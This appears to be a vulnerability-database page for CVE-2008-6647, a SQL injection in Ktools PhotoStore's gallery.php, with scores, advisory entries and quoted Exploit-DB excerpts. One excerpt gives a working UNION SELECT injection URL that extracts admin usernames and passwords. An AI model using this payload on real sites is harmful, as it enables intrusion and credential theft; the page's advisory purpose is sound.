CVE-2008-6647
published 2009-04-07CVE-2008-6647: SQL injection vulnerability in gallery.php in Ktools PhotoStore 3.4.3 allows remote attackers to execute arbitrary SQL commands via the gid parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in gallery.php in Ktools PhotoStore 3.4.3 allows remote attackers to execute arbitrary SQL commands via the gid parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ktools | photostore | — | — |
| ktools | photostore | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-799w-4vcg-xxx7: SQL injection vulnerability in crumbs
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-6648 [HIGH] CWE-89 GHSA-799w-4vcg-xxx7: SQL injection vulnerability in crumbs
SQL injection vulnerability in crumbs.php in Ktools PhotoStore 3.4.3 and 3.5.2 allows remote attackers to execute arbitrary SQL commands via the gid parameter to about_us.php. NOTE: this might be the same issue as CVE-2008-6647.
GHSA
GHSA-hxm7-55m9-pqcf: SQL injection vulnerability in gallery
ghsa_unreviewed·2022-05-17
CVE-2008-6647 [HIGH] CWE-89 GHSA-hxm7-55m9-pqcf: SQL injection vulnerability in gallery
SQL injection vulnerability in gallery.php in Ktools PhotoStore 3.4.3 allows remote attackers to execute arbitrary SQL commands via the gid parameter.
No detection rules found.
Exploit-DB
Ktools Photostore 3.5.2 - Multiple SQL Injections
exploitdb·2008-05-10
CVE-2008-6649 Ktools Photostore 3.5.2 - Multiple SQL Injections
Ktools Photostore 3.5.2 - Multiple SQL Injections
---
\#'#/
(-.-)
-------------------------oOO---(_)---OOo-------------------------
| Ktools Photostore <= v3.5.2 (crumbs.php) Remote SQL Injection |
| (works only with magic quotes = off) |
| coded by DNX |
[!] Discovered.: DNX
[!] Vendor.....: http://www.ktools.net
[!] Detected...: 27.04.2008
[!] Reported...: 29.04.2008
[!] Response...: xx.xx.2008
[!] Background.: PhotoStore allows you to setup a complete photo selling
website on your server or hosting space in just minutes.
[!] Price......: $295 Oo.
[!] Bug........: $_GET['gid'] in crumbs.php near line 11
05: if($_GET['gid']){
08: function crumbs($gid){
09: global $db, $crumb_array_name, $crumb_array_id;
10:
11: $ca_result = mysql_query("SELECT id,title,nest_under FROM photo_galleri
Exploit-DB
Ktools Photostore 3.5.1 - 'gid' SQL Injection
exploitdb·2008-05-09
CVE-2008-6649 Ktools Photostore 3.5.1 - 'gid' SQL Injection
Ktools Photostore 3.5.1 - 'gid' SQL Injection
---
#########################################
# Remote SQL Injection Vulnerability #
# #
# PhotoStore 3.4.3 ( gallery.php gid ) #
# #
#########################################
## Script NAME : PhotoStore
## VERSION : 3.4.3
## DOWNLOAD : http://www.ktools.net/
#########################################
## AuTh0r : Mr.SQL
## H0ME : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
#########################################
## D0rk :: n/a ;)
################################################################################
## ExPlo!t For ADMIN INFO :
===> http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*
#############
## Explo!T For Users INFO
No writeups or analysis indexed.
http://osvdb.org/45140http://secunia.com/advisories/30194http://www.securityfocus.com/bid/29132https://exchange.xforce.ibmcloud.com/vulnerabilities/42318https://www.exploit-db.com/exploits/5580http://osvdb.org/45140http://secunia.com/advisories/30194http://www.securityfocus.com/bid/29132https://exchange.xforce.ibmcloud.com/vulnerabilities/42318https://www.exploit-db.com/exploits/5580
2009-04-07
Published